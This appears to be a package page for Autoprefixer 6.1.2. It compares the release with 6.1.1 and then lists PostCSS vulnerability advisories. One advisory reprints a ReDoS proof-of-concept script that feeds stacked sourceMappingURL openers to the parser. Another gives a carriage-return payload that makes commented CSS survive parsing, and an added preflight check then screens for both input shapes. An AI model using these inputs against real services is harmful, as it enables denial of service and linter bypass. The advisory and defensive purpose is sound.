Autoprefixer, a vital tool for modern web development, automatically adds vendor prefixes to your CSS, ensuring compatibility across different browsers. Comparing versions 6.1.2 and 6.1.1, subtle but important distinctions emerge. Both versions rely on PostCSS for parsing and manipulating CSS and offer a smooth workflow through various build systems. Version 6.1.2, released on November 30, 2015, builds upon its predecessor (released a week before, on November 23) primarily by updating the caniuse-db dependency to version ^1.0.30000372. This update is critical because caniuse-db provides the data regarding browser support for various CSS features. Therefore, 6.1.2 offers more accurate and up-to-date prefixing based on the latest browser landscape compared to 6.1.1, which uses caniuse-db version ^1.0.30000367. For developers, this translates to improved cross-browser compatibility and reduced effort in manually managing vendor prefixes. The core functionality remains consistent, allowing for seamless upgrades. Both versions share the same development dependencies, ensuring a familiar environment for contributors. Upgrading to 6.1.2 is recommended to leverage the most current browser support data, resulting in better and more reliable CSS prefixing for your projects.
All the vulnerabilities related to version 6.1.2 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss");

// Builds a stylesheet followed by n unterminated source-map annotation openers,
// the input shape that triggers the backtracking in lib/previous-map.js.
function build_attack(n) {
    var ret = "a{}";
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL=";
    }
    return ret + "!";
}

// Warm up the parser with a well-formed annotation, then time progressively longer inputs.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */');
for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i);
        try {
            postcss.parse(attack_str);
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contain parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
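Both advisories above describe input shapes a linter can screen for before handing untrusted CSS to a PostCSS version that has not yet been upgraded. The following is an added example, not code from the advisories or from PostCSS itself: a preflight check that rejects stacked sourceMappingURL annotations (the shape of the ReDoS input) and bare carriage returns (the character behind the \r discrepancy), and normalises line endings. The `preflightCss` name and the size limit are assumptions for this example.

```javascript
// Added example: pre-parse screening of untrusted CSS. The 1 MiB limit is an
// assumption chosen for this example, not a value from either advisory.
const MAX_INPUT_BYTES = 1024 * 1024;

// The comment opener that the ReDoS proof of concept repeats thousands of times.
// No nested quantifiers here, so this check itself backtracks linearly.
const ANNOTATION = /\/\*\s*#\s*sourceMappingURL=/g;

// A carriage return that is not part of a CRLF pair.
const BARE_CR = /\r(?!\n)/;

function preflightCss(css, opts = {}) {
  const maxBytes = opts.maxBytes ?? MAX_INPUT_BYTES;
  const reasons = [];

  if (new TextEncoder().encode(css).length > maxBytes) {
    reasons.push("input exceeds size limit");
  }

  // A well-formed stylesheet carries at most one source-map annotation, at the
  // end. Many stacked, unterminated annotations are the ReDoS input shape.
  const annotations = (css.match(ANNOTATION) || []).length;
  if (annotations > 1) {
    reasons.push(annotations + " sourceMappingURL annotations (expected at most 1)");
  }

  if (BARE_CR.test(css)) {
    reasons.push("bare carriage return (\\r not followed by \\n)");
  }

  // Normalise line endings so the parser and a browser agree on line breaks.
  const normalized = css.replace(/\r\n?/g, "\n");
  return { ok: reasons.length === 0, reasons, annotations, normalized };
}

// Constructed sample inputs for demonstration.
const samples = [
  ["benign", "a{}\n/*# sourceMappingURL=a.css.map */\n"],
  ["redos-shaped", "a{}" + "/*# sourceMappingURL=".repeat(50) + "!"], // same shape as build_attack(50)
  ["cr-injected", "@font-face{ font:(\r/*);}"],
];

for (const [name, css] of samples) {
  const r = preflightCss(css);
  console.log(name + ": " + (r.ok ? "ok" : "rejected (" + r.reasons.join("; ") + ")"));
}
```

Rejecting the input is a stopgap for linters that cannot upgrade immediately; the fix for both issues is moving to a patched PostCSS release.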